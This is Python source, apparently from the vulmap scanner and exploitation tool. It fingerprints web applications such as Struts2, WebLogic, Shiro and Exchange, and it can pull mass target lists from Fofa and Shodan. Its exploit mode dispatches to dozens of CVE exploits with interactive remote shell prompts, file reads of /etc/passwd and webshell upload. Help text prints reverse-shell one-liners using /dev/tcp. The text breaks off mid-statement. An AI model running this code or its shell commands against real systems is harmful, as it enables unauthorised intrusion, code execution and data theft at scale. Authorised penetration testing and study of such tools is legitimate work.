def start(url, webapps_identify): ua = globals.get_value("UA") # 获取全局变量UA timeout = globals.get_value("TIMEOUT") # 获取全局变量UA headers = {'User-Agent': ua} try: resp = requests.get(url, headers=headers, timeout=timeout, verify=False) except: resp = "null" start = Identify(url) start.flink(webapps_identify, resp, url) start.tomcat(webapps_identify, resp, url) start.fastjson(webapps_identify, url) start.elasticsearch(webapps_identify, resp, url) start.jenkins(webapps_identify, resp, url) start.weblogic(webapps_identify, resp, url) start.spring(webapps_identify, resp, url) start.solr(webapps_identify, resp, url) start.nexus(webapps_identify, resp, url) start.jboss(webapps_identify, resp, url) start.drupal(webapps_identify, resp, url) start.struts2(webapps_identify, resp, url) start.shiro(webapps_identify, resp, url) start.druid(webapps_identify, resp, url) start.eyou(webapps_identify, resp, url) start.coremail(webapps_identify, resp, url) if webapps_identify: for a in webapps_identify: print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" The identification target is: " + a + " "))) else: webapps_identify.append("all") print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" Unable to identify target, Run all pocs ")))
def proxy_set(pr, pr_mode): headers = globals.get_value("HEADERS") # 获取全局变量HEADERS try: proxy_ip = str(re.search(r"(.*):", pr).group(1)) proxy_port = int(re.search(r":(.*)", pr).group(1)) except AttributeError: print( now.timed(de=0) + color.red_warn() + color.red( " Proxy format error (e.g. --proxy-socks 127.0.0.1:1080)")) sys.exit(0) if r"socks" in pr_mode: socks.set_default_proxy(socks.SOCKS5, proxy_ip, proxy_port) elif r"http" in pr_mode: socks.set_default_proxy(socks.HTTP, addr=proxy_ip, port=proxy_port) socket.socket = socks.socksocket try: proxy_ip_info = requests.get("http://api.hostip.info/get_json.php", headers=headers, timeout=5) proxy_ip_info_json = json.loads(proxy_ip_info.text) proxy_ip_info_dict = "[region: " + proxy_ip_info_json[ "country_name"] + "] " + "[city: " + proxy_ip_info_json[ "city"] + "] " + "[proxy ip: " + proxy_ip_info_json["ip"] + "]" except requests.exceptions.ConnectionError: proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]" except requests.exceptions.Timeout: proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]" print( now.timed(de=0) + color.yel_info() + color.yellow(" Use custom proxy: " + pr)) print( now.timed(de=0) + color.yel_info() + color.yellow(" Proxy info: " + proxy_ip_info_dict))
def version_check(): version = globals.get_value("VULMAP") # 获取全局变量VULMAP版本号 timeout = globals.get_value("TIMEOUT") # 获取全局变量TIMEOUT headers = globals.get_value("HEADERS") # 获取全局变量HEADERS github_ver_url = "https://github.com/zhzyker/vulmap/blob/main/version" now_warn = now.timed(de=0) + color.red_warn() try: github_ver_request = requests.get(url=github_ver_url, headers=headers, timeout=timeout) version_res = r'blob-code blob-code-inner js-file-line">(.*)</td>' github_ver = re.findall(version_res, github_ver_request.text, re.S | re.M)[0] if version == github_ver: print( now.timed(de=0) + color.yel_info() + color.yellow(" Currently the latest version: " + version)) elif version < github_ver: print(now_warn + color.red(" The current version is: " + version + ", Latest version: " + github_ver)) print(now_warn + color.red( " Go to github https://github.com/zhzyker/vulmap update")) else: print(now_warn + color.red(" Unknown version: " + version)) except requests.exceptions.ConnectionError: print(now_warn + color.red(" The current version is: " + version + ", Version check filed")) except requests.exceptions.Timeout: print(now_warn + color.red(" The current version is: " + version + ", Version check filed"))
def fofa(fofa, size): timeout = globals.get_value("TIMEOUT") # 获取全局变量UA headers = globals.get_value("HEADERS") # 获取全局变量HEADERS email = globals.get_value("fofa_email") key = globals.get_value("fofa_key") fofa_target = [] keyword = base64.b64encode(str.encode(fofa)) qbase = keyword.decode('ascii') api_url = "https://fofa.so/api/v1/search/all?email={email}&key={key}&size={size}&qbase64={qbase}".format(email=email, key=key, size=size, qbase=qbase) print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa api: " + api_url)) try: res = requests.get(api_url, headers=headers, timeout=timeout, verify=False) if res.status_code != 200: print(now.timed(de=0) + color.red_warn() + color.red(" " + res.text)) exit(0) r = json.loads(res.text) for i in r['results']: fofa_target.append(i[0]) return fofa_target except requests.exceptions.Timeout: print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because of timeout ")) exit(0) except requests.exceptions.ConnectionError: print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because the connection failed ")) exit(0) except Exception as e: print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because unknown error ")) exit(0)
def install_crypto(): input_crypto = input( now.timed(de=0) + color.yel_info() + color.yellow( " pycryptodome dependency not found, install it now (y/n): ")) if input_crypto == "y": try: pwd_packages = sysconfig.get_paths()["purelib"] os.chdir(pwd_vulmap) pycryptodome_tar = "./thirdparty/pycryptodome.tar.gz" t = tarfile.open(pycryptodome_tar) t.extractall(path=pwd_packages) pwd_crypto = pwd_packages + "/pycryptodome" os.chdir(pwd_crypto) try: if os.system( "python3 setup.py install >> /dev/null 2>&1") == 0: print( now.timed(de=0) + color.yel_info() + color.yellow(" pycryptodome install to: " + pwd_packages)) print( now.timed(de=0) + color.yel_info() + color.yellow( " Crypto dependency installation is complete")) #print(now.timed(de=0) + color.red_warn() + color.yellow( # " Permission denied, need root permissions to install")) #if os.system("sudo python3 setup.py install") == 0: # print(now.timed(de=0) + color.yel_info() + color.yellow(" pycryptodome install to: " + pwd_packages)) # print(now.timed(de=0) + color.yel_info() + color.yellow( # " pycryptodome dependency installation is complete")) except: print( now.timed(de=0) + color.red_warn() + color.yellow( " Crypto installation failed, please use \" pip3 install pycryptodome\" to install" )) except Exception as error: if r"Permission" in str(error): print( now.timed(de=0) + color.red_warn() + color.yellow( " Permission denied: Need root privileges or \"sudo xxxx\"" ))
def dismap(line): if "dismap" in line: print( now.timed(de=0) + color.yel_info() + color.green(" The file is dismap Identification results")) globals.set_value("DISMAP", "true") return "######" elif "######" in line: return "######" if globals.get_value("DISMAP") == "true": try: search = re.findall("[{] (.*?) [}]", line) return search[0] except: return else: return line
def identify_prt(name): print("\r{0}{1}{2}".format( now.timed(de=0), color.yel_info(), color.cyan(" Identify whether the target is: " + color.magenta(name))), end=" ")
def control_options(args): # 选项控制,用于处理所有选项 delay = globals.get_value("DELAY") # 获取全局变量延时时间DELAY now_warn = now.timed(de=delay) + color.red_warn() if args.socks: proxy_set(args.socks, "socks") # proxy support socks5 http https elif args.http: proxy_set(args.http, "http") # proxy support socks5 http https if args.list is False: # 判断是否显示漏洞列表 print(now.timed(de=0) + color.yel_info() + color.yellow(" List of supported vulnerabilities")) print(vul_list()) if args.thread_num != 10: # 判断是否为默认线程 print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num))) if args.vul is not None: # 判断是否-v进行漏洞利用 args.mode = "exp" # 若进行漏洞利用修改模式为exp if args.debug is False: # 判断是否开启--debug功能 print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information")) globals.set_value("DEBUG", "debug") # 设置全局变量DEBUG #ceye_api() # 测试ceye连接性 if dns_request(): # 初始化dnslog, 并判断是否可用 pass else: print(now_warn + color.red(" Dnslog platform (hyuga.co dnslog.cn ceye.io) is not available")) if args.O_TEXT: # 判断是否text输出 if os.path.isfile(args.O_TEXT): # 判断text输出文件是否冲突 print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_TEXT + "] already exists")) exit(0) if args.O_JSON: # 判断是否json输出 if os.path.isfile(args.O_JSON): # 判断json输出文件是否冲突 print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists")) exit(0) if args.mode is None or args.mode == "poc": # 判断是否进入poc模式 if args.url is not None and args.file is None: # 判断是否为仅-u扫描单个URL args.url = url_check(args.url) # 处理url格式 if survival_check(args.url) == "f": # 检查目标存活状态 print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + args.url)) exit(0) # 单个url时存活失败就退出 print(now.timed(de=0) + color.yel_info() + color.cyan(" Start scanning target: " + args.url)) if args.app is None: # 判断是否扫描扫描全部webapps globals.set_value("RUNALLPOC", True) # 扫描单个URL并且所有webapps时RUNALLPOC=True core.control_webapps("url", args.url, args.app, "poc") else: # 否则扫描单个webapps core.control_webapps("url", args.url, args.app, "poc") elif args.file is not None and args.url is None: # 判断是否为仅-f批量扫描文件 if os.path.isfile(args.file): # 判断批量目标文件是否存在 print(now.timed(de=0) + color.yel_info() + color.cyan(" Start batch scanning target: " + args.file)) else: # 没有文件错误并退出 print(now.timed(de=0) + color.red_warn() + color.red(" Not found target file: " + args.file)) exit(0) if args.app is None: # 判断是否扫描扫描全部webapps globals.set_value("RUNALLPOC", "FILE") # 批量扫描URL并且所有webapps时RUNALLPOC="FILE" core.control_webapps("file", args.file, args.app, "poc") else: # 否则批量扫描单个webapps core.control_webapps("file", args.file, args.app, "poc") elif args.url is None and args.file is None and args.fofa is not None: # 调用fofa api print(now.timed(de=0) + color.yel_info() + color.yellow(" Use fofa api to search [" + args.fofa + "] and start scanning")) if r"xxxxxx" in globals.get_value("fofa_key"): # 使用fofa api之前判断fofa信息是否正确 print(now.timed(de=0) + color.red_warn() + color.red(" Check fofa email is xxxxxx Please replace key and email")) print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://fofa.so/user/users/info find key and email")) print(now.timed(de=0) + color.red_warn() + color.red(" How to use key and email reference https://github.com/zhzyker/vulmap")) exit(0) else: print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa email: " + globals.get_value("fofa_email"))) print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa key: " + globals.get_value("fofa_key"))) fofa_list = fofa(args.fofa, args.size) # 调用fofa api拿到目标数组默认100个 if args.app is None: # 判断是否扫描扫描全部webapps core.control_webapps("fofa", fofa_list, args.app, "poc") else: core.control_webapps("fofa", fofa_list, args.app, "poc") elif args.url is None and args.file is None and args.shodan is not None: # 调用fofa api 或者 shodan api print(now.timed(de=0) + color.yel_info() + color.yellow(" Use shodan api to search [" + args.shodan + "] and start scanning")) if r"xxxxxx" in globals.get_value("shodan_key"): # 使用shodan api之前判断shodan信息是否正确 print(now.timed(de=0) + color.red_warn() + color.red(" Check shodan key is xxxxxx Please replace key")) print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://account.shodan.io/ find key")) print(now.timed(de=0) + color.red_warn() + color.red(" How to use key reference https://github.com/zhzyker/vulmap")) exit(0) else: print(now.timed(de=0) + color.yel_info() + color.yellow(" Shodan key: " + globals.get_value("shodan_key"))) shodan_list = shodan_api(args.shodan) # 调用shodan api拿到目标数组默认100个 if args.app is None: # 判断是否扫描扫描全部webapps core.control_webapps("shodan", shodan_list, args.app, "poc") else: core.control_webapps("shodan", shodan_list, args.app, "poc") if args.O_TEXT: print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT)) if args.O_JSON: print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON)) elif args.mode == "exp": # 漏洞利用模式参数较少 if args.vul is not None and args.url is not None: # 判断是否进入漏洞利用模式 core.control_webapps("url", args.url, args.vul, "exp") else: print(now_warn + color.red(" Options error, -v must specify -u")) else: print(now_warn + color.red(" Options error ... ..."))
def control_webapps(target_type, target, webapps, mode): t_num = globals.get_value("THREADNUM") # 线程数量 thread_poc = [] # 多线程字典,用于添加线程任务 gevent_pool = [] # 协程字段,用于添加协程任务 thread_pool = ThreadPoolExecutor(t_num) # 多线程池数量t_num由选项控制,默认10线程 webapps_identify = [] # 定义目标类型字典,用于目标类型识别并记录,为跑所有poc时进行类型识别 if mode == "poc": # poc漏洞扫描模式 if target_type == "url": # ========================================================= 第一种扫描仅扫描单个URL output("text", "[*] " + target) # 丢给output模块判断是否输出文件 if webapps is None: # 判断是否进行指纹识别 Identify.start(target, webapps_identify) # 第一种情况需要进行指纹识别 elif r"all" in webapps: # 判断是否扫描所有类型poc print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify to scan all vulnerabilities")) webapps_identify.append("all") # 指定扫描所有时,需要将指纹全部指定为all else: webapps_identify = webapps # 指定但不是all,也可以指定多个类型,比如-a solr struts2 print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify scan vulnerabilities for: "), end='') count = 0 # 用于判断类型的数量,一个还是多个 for w_i in webapps_identify: print(color.cyan(w_i), end=' ') count += 1 if count % len(webapps_identify) == 0: print(end='\n') core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, target) # 调用scan开始扫描 joinall(gevent_pool) # 运行协程池 wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完 print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended ")) elif target_type == "file": # ========================= 第二种扫描情况,批量扫描文件不指定webapps时需要做指纹识别 count_line = -1 # 用于判断行数 count_null = 0 for line in open(target).readlines(): # 判断文件里有多少空行 line = line.strip() # 读取目标时过滤杂质 if line == "": count_null += 1 for count_line, line in enumerate(open(target, 'rU')): # 判断文件的行数 pass count_line += 1 # 行数加1 target_num = count_line - count_null now_num = 0 # 当前数量 target_list = [] # 批量扫描需要读取的字典 with open(target, 'r') as _: # 打开目标文件 for line in _: # 用for循环读取文件 line = line.strip() # 过滤杂质 if line: # 判断是否结束 target_list.append(line) # 读取到的目标加入字典准备扫描 now_num += 1 # 读取到之后当前数量+1 furl = line furl = url_check(furl) # url格式检测 output("text", "[*] " + furl) # 丢给output模块判断是否输出文件 if survival_check(furl) == "f": # 如果存活检测失败就跳过 print(now.timed(de=0) + color.red_warn() + color.red( " Current:[" + str(now_num) + "] Total:[" + str( target_num) + "] Survival check failed: " + furl)) continue else: # 存活不失败就正常显示 print(now.timed(de=0) + color.yel_info() + color.yellow( " Current:[" + str(now_num) + "] Total:[" + str( target_num) + "] Scanning target: " + furl)) if webapps is None: # 判断是否要进行指纹识别 webapps_identify.clear() # 可能跟单个url冲突需要清理字典 Identify.start(furl, webapps_identify) # 识别指纹 # print(webapps_identify) elif r"all" in webapps: # 不识别指纹运行所有 print(now.timed(de=0) + color.yel_info() + color.yellow( " Specify to scan all vulnerabilities")) webapps_identify.append("all") else: webapps_identify = webapps print(now.timed(de=0) + color.yel_info() + color.yellow( " Specify scan vulnerabilities for: "), end='') count = 0 for w_i in webapps_identify: print(color.cyan(w_i), end=' ') count += 1 if count % len(webapps_identify) == 0: print(end='\n') core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, furl) # 开扫 joinall(gevent_pool) # 运行协程池 wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完 print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended ")) elif target_type == "fofa" or target_type == "shodan": # ======================================================= 第三种调用fofa api total = len(target) # fofa api的总数,不出意外100个 if webapps is not None: if r"all" in webapps: # 不识别直接扫描所有类型 print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify to scan all vulnerabilities")) webapps_identify.append("all") else: webapps_identify = webapps # 扫描指定的类型 print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify scan vulnerabilities for: "), end='') count = 0 for w_i in webapps_identify: print(color.cyan(w_i), end=' ') count += 1 if count % len(webapps_identify) == 0: print(end='\n') now_num = 0 # 当前第几个 for f_target in target: fofa_target = url_check(f_target) output("text", "[*] " + fofa_target) # 丢给output模块判断是否输出文件 now_num += 1 if survival_check(fofa_target) == "f": print(now.timed(de=0) + color.red_warn() + color.red( " Current:[" + str(now_num) + "] Total:[" + str( total) + "] Survival check failed: " + fofa_target)) continue else: print(now.timed(de=0) + color.yel_info() + color.yellow( " Current:[" + str(now_num) + "] Total:[" + str( total) + "] Scanning target: " + fofa_target)) if webapps is None: # 需要指纹识别 Identify.start(target, webapps_identify) # 是否需要进行指纹识别 core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, fofa_target) joinall(gevent_pool) # 运行协程池 wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完 print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended ")) elif mode == "exp": # 漏洞利用 vul_num = webapps exploit(target, vul_num) # 调用core中的exploit
def exploit(target, vul_num): target = url_check(target) if survival_check(target) == "f": print( now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + target)) exit(0) delay = globals.get_value("DELAY") # 获取全局变量DELAY exp_apache_shiro = ApacheShiro(target) exp_apache_solr = ApacheSolr(target) exp_apache_tomcat = ApacheTomcat(target) exp_elasticsearch = Elasticsearch(target) exp_apache_flink = ApacheFlink(target) exp_jenkins = Jenkins(target) exp_spring = Spring(target) exp_nexus = Nexus(target) exp_oracle_weblogic = OracleWeblogic(target) exp_redhat_jboss = RedHatJBoss(target) exp_apache_unomi = ApacheUnomi(target) exp_thinkphp = ThinkPHP(target) exp_drupal = Drupal(target) exp_fastjson = Fastjson(target) exp_apache_struts2 = ApacheStruts2(target) exp_apache_druid = ApacheDruid(target) exp_laravel = Laravel(target) exp_vmware = Vmware(target) exp_saltstack = SaltStack(target) exp_exchange = Exchange(target) exp_big_ip = BIG_IP(target) exp_apache_ofbiz = ApacheOFBiz(target) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target)) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num)) nc = now.timed(de=0) + color.yel_info() + color.yellow( " input \"nc\" bounce linux shell") up = now.timed(de=0) + color.yel_info() + color.yellow( " input \"upload\" upload webshell") rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow( " RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)") bash = now.timed(de=0) + color.yel_info() + color.yellow( " nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"") bash_2 = now.timed(de=0) + color.yel_info() + color.yellow( " nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\"" ) cmd = "whoami" # 为了消除pycharm错误提示,没啥用 file = "/etc/passwd" # 为了消除pycharm错误提示,没啥用 path = "/tmp/test" # 为了消除pycharm错误提示,没啥用 shiro_key = "1" # 为了消除pycharm错误提示,没啥用 shiro_gadget = "1" # 为了消除pycharm错误提示,没啥用 nexus_u = "admin" # 为了消除pycharm错误提示,没啥用 nexus_p = "admin" # 为了消除pycharm错误提示,没啥用 laravel_key = "null" # 为了消除pycharm错误提示,没啥用 laravel_gadget = 1 # 为了消除pycharm错误提示,没啥用 if vul_num not in explists: print( now.timed(de=0) + color.red_warn() + color.red( " The vulnerability does not support exploitation. Please refer to \"--list\"" )) sys.exit(0) elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437": if os_check() == "linux" or os_check() == "other": shiro_key = input(now.timed(de=delay) + color.green("[+] key: ")) shiro_gadget = input( now.timed(de=delay) + color.green("[+] gadget: ")) elif os_check() == "windows": shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ") shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget) elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_tomcat.cve_2020_1938_exp(file) elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2019_3799_exp(file) elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2020_5410_exp(file) elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_flink.cve_2020_17519_exp(file) elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199": if os_check() == "linux" or os_check() == "other": nexus_u = input( now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows": nexus_u = input( now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p) elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133": if os_check() == "linux" or os_check() == "other": laravel_key = input( now.timed(de=delay) + color.green("[+] Input APP_KEY: ")) elif os_check() == "windows": laravel_key = input( now.no_color_timed(de=delay) + "[+] Input APP_KEY: ") if os_check() == "linux" or os_check() == "other": laravel_gadget = input( now.timed(de=delay) + color.green( "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")) elif os_check() == "windows": laravel_gadget = input( now.no_color_timed(de=delay) + "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget) elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972": if os_check() == "linux" or os_check() == "other": os_type = input( now.timed(de=delay) + color.green("[+] The target os type (linux/windows): ")) elif os_check() == "windows": os_type = input( now.no_color_timed(de=delay) + "[+] The target os type (linux/windows): ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_vmware.cve_2021_21972_exp(cmd, os_type) elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282": if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] upload file: ")) path = input( now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] upload file: ") path = input( now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): ")) while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_saltstack.cve_2021_25282_exp(cmd, file, path) elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065": if os_check() == "linux" or os_check() == "other": email = input(now.timed(de=delay) + color.green("[+] email: ")) file = input( now.timed(de=delay) + color.green("[+] webshell name (e.g. shell.aspx): ")) elif os_check() == "windows": email = input(now.timed(de=delay) + color.green("[+] email: ")) file = input( now.no_color_timed(de=delay) + "[+] uwebshell name (e.g. shell.aspx: ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_exchange.cve_2021_27065_exp(cmd, file, email) # 远程命令执行漏洞单独简单运行 else: while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": exit(0) elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615": exp_apache_tomcat.cve_2017_12615_exp(cmd) elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120": exp_elasticsearch.cve_2014_3120_exp(cmd) elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427": exp_elasticsearch.cve_2015_1427_exp(cmd) elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861": exp_jenkins.cve_2018_1000861_exp(cmd) elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506": exp_oracle_weblogic.cve_2017_3506_exp(cmd) elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271": print(nc) print(up) exp_oracle_weblogic.cve_2017_10271_exp(cmd) elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894": exp_oracle_weblogic.cve_2018_2894_exp(cmd) elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725": print(nc) print(up) exp_oracle_weblogic.cve_2019_2725_exp(cmd) elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729": print(nc) exp_oracle_weblogic.cve_2019_2729_exp(cmd) elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555": exp_oracle_weblogic.cve_2020_2555_exp(cmd) elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883": exp_oracle_weblogic.cve_2020_2883_exp(cmd) elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882": exp_oracle_weblogic.cve_2020_14882_exp(cmd) elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629": exp_apache_solr.cve_2017_12629_exp(cmd) elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558": exp_apache_solr.cve_2019_17558_exp(cmd) elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238": exp_nexus.cve_2019_7238_exp(cmd) elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738": exp_redhat_jboss.cve_2010_0738_exp(cmd) elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428": exp_redhat_jboss.cve_2010_1428_exp(cmd) elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501": exp_redhat_jboss.cve_2015_7501_exp(cmd) elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942": exp_apache_unomi.cve_2020_13942_exp(cmd) elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082": print(up) exp_thinkphp.cve_2019_9082_exp(cmd) elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062": exp_thinkphp.cve_2018_20062_exp(cmd) elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600": exp_drupal.cve_2018_7600_exp(cmd) elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602": exp_drupal.cve_2018_7602_exp(cmd) elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340": exp_drupal.cve_2019_6340_exp(cmd) elif vul_num == "S2-005" or vul_num == "s2-005": exp_apache_struts2.s2_005_exp(cmd) elif vul_num == "S2-008" or vul_num == "s2-008": exp_apache_struts2.s2_008_exp(cmd) elif vul_num == "S2-009" or vul_num == "s2-009": exp_apache_struts2.s2_009_exp(cmd) elif vul_num == "S2-013" or vul_num == "s2-013": exp_apache_struts2.s2_013_exp(cmd) elif vul_num == "S2-015" or vul_num == "s2-015": exp_apache_struts2.s2_015_exp(cmd) elif vul_num == "S2-016" or vul_num == "s2-016": exp_apache_struts2.s2_016_exp(cmd) elif vul_num == "S2-029" or vul_num == "s2-029": exp_apache_struts2.s2_029_exp(cmd) elif vul_num == "S2-032" or vul_num == "s2-032": exp_apache_struts2.s2_032_exp(cmd) elif vul_num == "S2-045" or vul_num == "s2-045": exp_apache_struts2.s2_045_exp(cmd) elif vul_num == "S2-046" or vul_num == "s2-046": exp_apache_struts2.s2_046_exp(cmd) elif vul_num == "S2-048" or vul_num == "s2-048": exp_apache_struts2.s2_048_exp(cmd) elif vul_num == "S2-052" or vul_num == "s2-052": exp_apache_struts2.s2_052_exp(cmd) elif vul_num == "S2-057" or vul_num == "s2-057": exp_apache_struts2.s2_057_exp(cmd) elif vul_num == "S2-059" or vul_num == "s2-059": exp_apache_struts2.s2_059_exp(cmd) elif vul_num == "S2-061" or vul_num == "s2-061": exp_apache_struts2.s2_061_exp(cmd) elif vul_num == "S2-devMode" or vul_num == "s2-devmode": exp_apache_struts2.s2_devMode_exp(cmd) elif vul_num == "1.2.24": print(rmi_ldap) exp_fastjson.fastjson_1224_exp(cmd) elif vul_num == "1.2.47": print(rmi_ldap) exp_fastjson.fastjson_1247_exp(cmd) elif vul_num == "1.2.62": print(rmi_ldap) exp_fastjson.fastjson_1262_exp(cmd) elif vul_num == "CVE-2021-25646": print(bash_2) exp_apache_druid.cve_2021_25646_exp(cmd) elif vul_num == "CVE-2021-22986": exp_big_ip.cve_2021_22986_exp(cmd) elif vul_num == 